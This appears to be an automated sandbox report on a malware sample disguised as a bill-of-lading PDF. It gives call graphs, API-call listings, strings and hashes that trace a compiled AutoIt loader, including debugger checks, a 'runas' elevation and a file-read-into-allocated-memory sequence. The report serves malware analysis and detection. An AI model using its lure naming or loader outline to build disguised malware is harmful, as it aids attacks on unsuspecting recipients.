84630->84138 84632->84144 84638 4523e1 _wcscpy 84633->84638 84634 4151b0 81 API calls __fread_nolock 84634->84638 84635 44afdc GetSystemTimeAsFileTime 84635->84638 84636 452553 84636->84061 84636->84062 84637 41557c 105 API calls _fseek 84637->84638 84638->84634 84638->84635 84638->84636 84638->84637 84640 44b1b4 84639->84640 84641 44b1a6 84639->84641 84643 44b1ca 84640->84643 84644 414e06 138 API calls 84640->84644 84645 44b1c2 84640->84645 84642 414e06 138 API calls 84641->84642 84642->84640 84674 4352d1 81 API calls 2 library calls 84643->84674 84647 44b2c1 84644->84647 84645->84089 84647->84643 84650 44b2cf 84647->84650 84648 44b20d 84649 44b23b 84648->84649 84653 44b211 84648->84653 84675 43526e 84649->84675 84651 44b2dc 84650->84651 84654 414e94 __fcloseall 106 API calls 84650->84654 84651->84089 84652 44b21e 84657 44b22e 84652->84657 84661 414e94 __fcloseall 106 API calls 84652->84661 84653->84652 84656 414e94 __fcloseall 106 API calls 84653->84656 84654->84651 84656->84652 84657->84089 84658 44b242 84659 44b270 84658->84659 84660 44b248 84658->84660 84685 44b0af 111 API calls 84659->84685 84662 44b255 84660->84662 84664 414e94 __fcloseall 106 API calls 84660->84664 84661->84657 84665 44b265 84662->84665 84667 414e94 __fcloseall 106 API calls 84662->84667 84664->84662 84665->84089 84666 44b276 84686 43522c 67 API calls ___crtsetenv 84666->84686 84667->84665 84669 44b27c 84670 44b289 84669->84670 84672 414e94 __fcloseall 106 API calls 84669->84672 84671 44b299 84670->84671 84673 414e94 __fcloseall 106 API calls 84670->84673 84671->84089 84672->84670 84673->84671 84674->84648 84676 4138ba _malloc 67 API calls 84675->84676 84677 43527d 84676->84677 84678 4138ba _malloc 67 API calls 84677->84678 84679 43528d 84678->84679 84680 4138ba _malloc 67 API calls 84679->84680 84681 43529d 84680->84681 84684 4352bc 84681->84684 84687 43522c 67 API calls ___crtsetenv 84681->84687 84683 4352c8 84683->84658 84684->84658 84685->84666 84686->84669 84687->84683 84688->83978 84689->83980 84690->83994 84691->83994 84692->83994 84693->83997 84694->83994 84695->83994 84696->84002 84697->84011 84699->84013 84700->83902 84702 410148 SHGetDesktopFolder 84701->84702 84705 4101a3 _wcscpy 84701->84705 84703 41015a _wcscpy 84702->84703 84702->84705 84704 41018a SHGetPathFromIDListW 84703->84704 84703->84705 84704->84705 84705->83906 84706->83908 84708 40f5e0 152 API calls 84707->84708 84709 40f417 84708->84709 84710 42ca37 84709->84710 84711 40f42c 84709->84711 84712 42ca1f 84709->84712 84713 452574 140 API calls 84710->84713 84745 4037e0 139 API calls 7 library calls 84711->84745 84746 43717f 110 API calls _printf 84712->84746 84716 42ca50 84713->84716 84719 42ca76 84716->84719 84720 42ca54 84716->84720 84717 40f446 84717->83905 84718 42ca2d 84718->84710 84721 41171a 75 API calls 84719->84721 84722 434fe1 106 API calls 84720->84722 84735 42cacc ctype 84721->84735 84723 42ca5e 84722->84723 84747 43717f 110 API calls _printf 84723->84747 84725 42ca6c 84725->84719 84726 42ccc3 84727 413a88 ___crtsetenv 67 API calls 84726->84727 84728 42cccd 84727->84728 84729 434fe1 106 API calls 84728->84729 84730 42ccda 84729->84730 84734 401b70 75 API calls 84734->84735 84735->84726 84735->84734 84738 402cc0 75 API calls 2 library calls 84735->84738 84739 4026a0 84735->84739 84748 445051 75 API calls _realloc 84735->84748 84749 44c80c 87 API calls 3 library calls 84735->84749 84750 44b408 75 API calls 84735->84750 84738->84735 84740 40276b 84739->84740 84741 4026af 84739->84741 84740->84735 84741->84740 84742 41171a 75 API calls 84741->84742 84743 4026ee ctype 84741->84743 84742->84743 84743->84740 84744 41171a 75 API calls 84743->84744 84744->84743 84745->84717 84746->84718 84747->84725 84748->84735 84749->84735 84750->84735 84751->83915 84752->83916 84754 401bfb 84753->84754 84774 401cde 84753->84774 84776 4013a0 84754->84776 84757 42a9a0 LoadStringW 84760 42a9bb 84757->84760 84758 401c18 84759 4021e0 75 API calls 84758->84759 84761 401c2d 84759->84761 84782 40df50 75 API calls 84760->84782 84763 401c3a 84761->84763 84764 42a9cd 84761->84764 84763->84760 84765 401c44 84763->84765 84783 40d3b0 75 API calls 2 library calls 84764->84783 84781 40d3b0 75 API calls 2 library calls 84765->84781 84767 42a9dc 84769 42a9f0 84767->84769 84771 401c53 _memset _wcscpy _wcsncpy 84767->84771 84784 40d3b0 75 API calls 2 library calls 84769->84784 84772 401cc2 Shell_NotifyIconW 84771->84772 84772->84774 84773 42a9fe 84774->83927 84775->83922 84777 41171a 75 API calls 84776->84777 84778 4013c4 84777->84778 84779 401380 75 API calls 84778->84779 84780 4013d3 84779->84780 84780->84757 84780->84758 84781->84771 84782->84771 84783->84767 84784->84773 84785 444343 84788 444326 84785->84788 84787 44434e WriteFile 84789 444340 84788->84789 84790 4442c7 84788->84790 84789->84787 84795 40e190 SetFilePointerEx 84790->84795 84792 4442e0 SetFilePointerEx 84796 40e190 SetFilePointerEx 84792->84796 84794 4442ff 84794->84787 84795->84792 84796->84794 84797 46d22f 84800 46d098 84797->84800 84799 46d241 84801 46d0b5 84800->84801 84802 46d115 84801->84802 84803 46d0b9 84801->84803 84851 45c216 78 API calls 84802->84851 84804 41171a 75 API calls 84803->84804 84806 46d0c0 84804->84806 84808 46d0cc 84806->84808 84848 40d940 76 API calls 84806->84848 84807 46d126 84809 46d0f8 84807->84809 84815 46d142 84807->84815 84812 453063 111 API calls 84808->84812 84810 4092c0 VariantClear 84809->84810 84813 46d0fd 84810->84813 84814 46d0dd 84812->84814 84813->84799 84849 40dfa0 83 API calls 84814->84849 84816 46d1c8 84815->84816 84818 46d158 84815->84818 84856 4676a3 78 API calls 84816->84856 84821 453063 111 API calls 84818->84821 84819 46d0ea 84819->84815 84822 46d0ee 84819->84822 84831 46d15e 84821->84831 84822->84809 84850 44ade5 CloseHandle ctype 84822->84850 84823 46d1ce 84857 4444c2 SetFilePointerEx SetFilePointerEx WriteFile 84823->84857 84824 46d18d 84852 467fce 82 API calls 84824->84852 84826 46d196 84829 4013a0 75 API calls 84826->84829 84832 46d1a2 84829->84832 84830 46d1e7 84834 4092c0 VariantClear 84830->84834 84842 46d194 84830->84842 84831->84824 84831->84826 84853 40df50 75 API calls 84832->84853 84834->84842 84835 46d1ac 84854 40d3b0 75 API calls 2 library calls 84835->84854 84837 46d224 84837->84799 84838 46d1b8 84855 467fce 82 API calls 84838->84855 84841 46d216 84858 44ade5 CloseHandle ctype 84841->84858 84842->84837 84844 40d900 84842->84844 84845 40d917 84844->84845 84846 40d909 84844->84846 84845->84846 84847 40d91c CloseHandle 84845->84847 84846->84841 84847->84841 84848->84808 84849->84819 84850->84809 84851->84807 84852->84842 84853->84835 84854->84838 84855->84842 84856->84823 84857->84830 84858->84837 84859 42919b 84864 40ef10 84859->84864 84862 411421 __cinit 74 API calls 84863 4291aa 84862->84863 84865 41171a 75 API calls 84864->84865 84866 40ef17 84865->84866 84867 42ad48 84866->84867 84872 40ef40 74 API calls __cinit 84866->84872 84869 40ef2a 84873 40e470 84869->84873 84872->84869 84874 40c060 75 API calls 84873->84874 84875 40e483 GetVersionExW 84874->84875 84876 4021e0 75 API calls 84875->84876 84877 40e4bb 84876->84877 84899 40e600 84877->84899 84883 42accc 84885 42ad28 GetSystemInfo 84883->84885 84888 42ad38 GetSystemInfo 84885->84888 84886 40e557 GetCurrentProcess 84919 40ee30 LoadLibraryA GetProcAddress 84886->84919 84887 40e56c 84887->84888 84912 40eee0 84887->84912 84892 40e5c9 84916 40eea0 84892->84916 84895 40e5e0 84897 40e5f1 FreeLibrary 84895->84897 84898 40e5f4 84895->84898 84896 40e5dd FreeLibrary 84896->84895 84897->84898 84898->84862 84900 40e60b 84899->84900 84901 40c740 75 API calls 84900->84901 84902 40e4c2 84901->84902 84903 40e620 84902->84903 84904 40e62a 84903->84904 84905 42ac93 84904->84905 84906 40c740 75 API calls 84904->84906 84907 40e4ce 84906->84907 84907->84883 84908 40ee70 84907->84908 84909 40e551 84908->84909 84910 40ee76 LoadLibraryA 84908->84910 84909->84886 84909->84887 84910->84909 84911 40ee87 GetProcAddress 84910->84911 84911->84909 84913 40e5bf 84912->84913 84914 40eee6 LoadLibraryA 84912->84914 84913->84885 84913->84892 84914->84913 84915 40eef7 GetProcAddress 84914->84915 84915->84913 84920 40eec0 LoadLibraryA GetProcAddress 84916->84920 84918 40e5d3 GetNativeSystemInfo 84918->84895 84918->84896 84919->84887 84920->84918 84921 40227b8 84922 4020408 GetPEB 84921->84922 84923 4022898 84922->84923 84935 40226a8 84923->84935 84925 40228c1 CreateFileW 84927 4022910 84925->84927 84928 4022915 84925->84928 84928->84927 84929 402292c VirtualAlloc 84928->84929 84929->84927 84930 402294a ReadFile 84929->84930 84930->84927 84931 4022965 84930->84931 84932 40216a8 13 API calls 84931->84932 84933 4022998 84932->84933 84934 40229bb ExitProcess 84933->84934 84934->84927 84936 40226b1 Sleep 84935->84936 84937 40226bf 84936->84937 84938 40116e 84939 401119 DefWindowProcW 84938->84939

                                                                                                                      Executed Functions

                                                                                                                      Function 0040D6D0 Relevance: 28.1, APIs: 11, Strings: 5, Instructions: 141windowCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetCurrentDirectoryW.KERNEL32(00000104,?,00000001,?,00000000), ref: 0040D6E5
                                                                                                                        • Part of subcall function 00401F80: GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000104,?,?,?,?,00000000), ref: 00401FAD
                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 00402078
                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 0040208E
                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020A4
                                                                                                                        • Part of subcall function 00401F80: __wcsicoll.LIBCMT ref: 004020BA
                                                                                                                        • Part of subcall function 00401F80: _wcscpy.LIBCMT ref: 004020EF
                                                                                                                      • IsDebuggerPresent.KERNEL32(?), ref: 0040D6F1
                                                                                                                      • GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000104,?,004A7CF8,004A7CFC), ref: 0040D763
                                                                                                                        • Part of subcall function 00401440: GetFullPathNameW.KERNEL32(?,00000104,?,00000000), ref: 00401483
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,00000001,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 0040D7D6
                                                                                                                      • MessageBoxA.USER32(00000000,This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.,004846D6,00000010), ref: 00431AAB
                                                                                                                      • SetCurrentDirectoryW.KERNEL32(?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00431B0E
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00431B3F
                                                                                                                      • GetForegroundWindow.USER32(runas,?,?,?,00000001), ref: 00431B8B
                                                                                                                      • ShellExecuteW.SHELL32(00000000), ref: 00431B92
                                                                                                                        • Part of subcall function 004101F0: GetSysColorBrush.USER32(0000000F), ref: 004101F9
                                                                                                                        • Part of subcall function 004101F0: LoadCursorW.USER32(00000000,00007F00), ref: 00410209
                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,00000063), ref: 0041021F
                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A4), ref: 00410232
                                                                                                                        • Part of subcall function 004101F0: LoadIconW.USER32(?,000000A2), ref: 00410245
                                                                                                                        • Part of subcall function 004101F0: LoadImageW.USER32(?,00000063,00000001,00000010,00000010,00000000), ref: 0041026A
                                                                                                                        • Part of subcall function 004101F0: RegisterClassExW.USER32 ref: 004102C6
                                                                                                                        • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,?,00000000), ref: 00410415
                                                                                                                        • Part of subcall function 004103E0: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000), ref: 0041043E
                                                                                                                        • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 00410454
                                                                                                                        • Part of subcall function 004103E0: ShowWindow.USER32(?,00000000), ref: 0041045E
                                                                                                                        • Part of subcall function 0040E1E0: _memset.LIBCMT ref: 0040E202
                                                                                                                        • Part of subcall function 0040E1E0: Shell_NotifyIconW.SHELL32(00000000,?), ref: 0040E2C7
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: LoadWindow$IconName__wcsicoll$CurrentDirectory$CreateFileFullModulePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memset_wcscpy
                                                                                                                      • String ID: @GH$@GH$C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe$This is a compiled AutoIt script. AV researchers please email avsupport@autoitscript.com for support.$runas
                                                                                                                      • API String ID: 2493088469-2772579827
                                                                                                                      • Opcode ID: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                      • Instruction ID: f6e0ab4c143dd9a1f797559286fb6c41f0380d60009eb7dc722615656bf0e84e
                                                                                                                      • Opcode Fuzzy Hash: ba2e87c3f8820592b330de56266d8528cb530a4dab1fa245838381ec475db17a
                                                                                                                      • Instruction Fuzzy Hash: 0341F731618341ABD320F7A19C49BAF3BA4AB96704F04493FF941672D1DBBC9949C72E
                                                                                                                      Function 0040E470 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 165COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 200 40e470-40e500 call 40c060 GetVersionExW call 4021e0 call 40e600 call 40e620 209 40e506-40e509 200->209 210 42accc-42acd1 200->210 213 40e540-40e555 call 40ee70 209->213 214 40e50b-40e51c 209->214 211 42acd3-42acdb 210->211 212 42acdd-42ace0 210->212 215 42ad12-42ad20 211->215 216 42ace2-42aceb 212->216 217 42aced-42acf0 212->217 231 40e557-40e573 GetCurrentProcess call 40ee30 213->231 232 40e579-40e5a8 213->232 218 40e522-40e525 214->218 219 42ac9b-42aca7 214->219 230 42ad28-42ad2d GetSystemInfo 215->230 216->215 217->215 221 42acf2-42ad06 217->221 218->213 222 40e527-40e537 218->222 224 42acb2-42acba 219->224 225 42aca9-42acad 219->225 226 42ad08-42ad0c 221->226 227 42ad0e 221->227 228 42acbf-42acc7 222->228 229 40e53d 222->229 224->213 225->213 226->215 227->215 228->213 229->213 233 42ad38-42ad3d GetSystemInfo 230->233 231->232 242 40e575 231->242 232->233 234 40e5ae-40e5c3 call 40eee0 232->234 234->230 239 40e5c9-40e5db call 40eea0 GetNativeSystemInfo 234->239 244 40e5e0-40e5ef 239->244 245 40e5dd-40e5de FreeLibrary 239->245 242->232 246 40e5f1-40e5f2 FreeLibrary 244->246 247 40e5f4-40e5ff 244->247 245->244 246->247
                                                                                                                      APIs
                                                                                                                      • GetVersionExW.KERNEL32 ref: 0040E495
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      • GetCurrentProcess.KERNEL32(?,?), ref: 0040E560
                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?), ref: 0040E5D3
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E5DE
                                                                                                                      • FreeLibrary.KERNEL32(?), ref: 0040E5F2
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: FreeLibrary$CurrentInfoNativeProcessSystemVersion_wcslen
                                                                                                                      • String ID: pMH
                                                                                                                      • API String ID: 2923339712-2522892712
                                                                                                                      • Opcode ID: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                      • Instruction ID: 31d199e0849a18b4fe3a20375a839c17b1fda7a8e5a404adfed2e153d323e8b3
                                                                                                                      • Opcode Fuzzy Hash: 3f36deb7b7369dd68d3c05326faf84e57561e58110467ef3184d2bc56fc1d5cf
                                                                                                                      • Instruction Fuzzy Hash: D4612E71508792AEC311CB69C44425ABFE07B6A308F580E6EE48483A42D379E568C7AB
                                                                                                                      Function 0040EB70 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • LoadLibraryA.KERNELBASE(uxtheme.dll,0040EB55,0040D86E), ref: 0040EB7B
                                                                                                                      • GetProcAddress.KERNEL32(00000000,IsThemeActive), ref: 0040EB8D
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressLibraryLoadProc
                                                                                                                      • String ID: IsThemeActive$uxtheme.dll
                                                                                                                      • API String ID: 2574300362-3542929980
                                                                                                                      • Opcode ID: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                      • Instruction ID: e8120cabfd18d8fe06d2f96d8b82b2b5a4bcadd10797c678d2963416b1e4c3b8
                                                                                                                      • Opcode Fuzzy Hash: 9e55e894ab04f38af4b02d6559f2dae0f2ca0bab174211e780b997e8b6ae5f43
                                                                                                                      • Instruction Fuzzy Hash: 05D0C9B49407039AD7306F72C918B0A7BE4AB50342F204C3EF996A1694DBBCD0508B28
                                                                                                                      Function 00410B90 Relevance: 28.2, APIs: 13, Strings: 3, Instructions: 167registryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                        • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                                                      • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 00410C44
                                                                                                                      • __wsplitpath.LIBCMT ref: 00410C61
                                                                                                                        • Part of subcall function 00413DB0: __wsplitpath_helper.LIBCMT ref: 00413DF2
                                                                                                                      • _wcsncat.LIBCMT ref: 00410C78
                                                                                                                      • __wmakepath.LIBCMT ref: 00410C94
                                                                                                                        • Part of subcall function 00413E3C: __wmakepath_s.LIBCMT ref: 00413E52
                                                                                                                        • Part of subcall function 0041171A: std::bad_alloc::bad_alloc.LIBCMT ref: 00411757
                                                                                                                        • Part of subcall function 0041171A: std::bad_exception::bad_exception.LIBCMT ref: 0041176B
                                                                                                                        • Part of subcall function 0041171A: __CxxThrowException@8.LIBCMT ref: 00411779
                                                                                                                      • _wcscpy.LIBCMT ref: 00410CCC
                                                                                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00020019,?), ref: 00410CE9
                                                                                                                      • RegQueryValueExW.ADVAPI32 ref: 00429BE4
                                                                                                                      • _wcscat.LIBCMT ref: 00429C43
                                                                                                                      • _wcslen.LIBCMT ref: 00429C55
                                                                                                                      • _wcslen.LIBCMT ref: 00429C66
                                                                                                                      • _wcscat.LIBCMT ref: 00429C80
                                                                                                                      • _wcsncpy.LIBCMT ref: 00429CC0
                                                                                                                      • RegCloseKey.ADVAPI32(?), ref: 00429CDE
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: _wcscat_wcslen$CloseException@8FileModuleNameOpenQueryThrowValue__wmakepath__wmakepath_s__wsplitpath__wsplitpath_helper_malloc_wcscpy_wcsncat_wcsncpystd::bad_alloc::bad_allocstd::bad_exception::bad_exception
                                                                                                                      • String ID: Include$Software\AutoIt v3\AutoIt$\
                                                                                                                      • API String ID: 1004883554-2276155026
                                                                                                                      • Opcode ID: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                      • Instruction ID: ef4714a7fd58501e566ba693257e1f196c1b97611c18bc9c35ab262cfa7686fb
                                                                                                                      • Opcode Fuzzy Hash: d7f6643cad26fd3001d91627fc5ef1af4f656d40d4c5ca14c02d7ab544e78cf5
                                                                                                                      • Instruction Fuzzy Hash: B961B3B1508340DFC300EF65EC8599BBBE8FB99704F44882EF544C3261EBB59948CB5A
                                                                                                                      Function 004161C2 Relevance: 21.1, APIs: 14, Instructions: 86COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __amsg_exit$_fast_error_exit$CommandInitializeLine__cinit__ioinit__mtinit__wsetargv__wsetenvp__wwincmdln
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2477803136-0
                                                                                                                      • Opcode ID: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                                                                      • Instruction ID: 5d71fe406d9f608d9de966b229f2038f561e79c4b175df4472a1e640f9164680
                                                                                                                      • Opcode Fuzzy Hash: 5c6ad9204277a855c32b49e0d8ca3a5fd5782e976c2a5896ff1cb7bad4d5bdf3
                                                                                                                      • Instruction Fuzzy Hash: 6A21A671D00315A9DB14BBB2A9467EE2664AF1074CF1144AFF9056A2D3EEBCC8C1461D
                                                                                                                      Function 004523CE Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 145COMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: __fread_nolock$_fseek_wcscpy
                                                                                                                      • String ID: FILE
                                                                                                                      • API String ID: 3888824918-3121273764
                                                                                                                      • Opcode ID: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                      • Instruction ID: c0f9aeb359a44d31a21a8716142a7f32772eb03c7b5129f1ec28ea3a2d041f76
                                                                                                                      • Opcode Fuzzy Hash: e8200e6015bbe3313da03f0c122791b2111f624a8fcd35516e511649d5e709ac
                                                                                                                      • Instruction Fuzzy Hash: D541EFB1504300BBD310EB55CC81FEB73A9AFC8718F54491EFA8457181F679E644C7AA
                                                                                                                      Function 004102F0 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                      Download Yara Rule

                                                                                                                      Control-flow Graph

                                                                                                                      APIs
                                                                                                                      • GetSysColorBrush.USER32 ref: 00410326
                                                                                                                      • RegisterClassExW.USER32 ref: 00410359
                                                                                                                      • RegisterWindowMessageW.USER32(TaskbarCreated,?,?,?,?,?,?), ref: 0041036A
                                                                                                                      • InitCommonControlsEx.COMCTL32(0000000F,?,?,?,?,?,?), ref: 0041038A
                                                                                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,?,?,?,?,?), ref: 0041039A
                                                                                                                      • LoadIconW.USER32(00400000,000000A9), ref: 004103B1
                                                                                                                      • ImageList_ReplaceIcon.COMCTL32(00A50870,000000FF,00000000,?,?,?,?,?,?), ref: 004103C1
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      • Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      • Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                                                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                                                                                      • API String ID: 2914291525-1005189915
                                                                                                                      • Opcode ID: b078764552fc12f322907e2d646497bc841117f43cad8f480623bc49e689b681
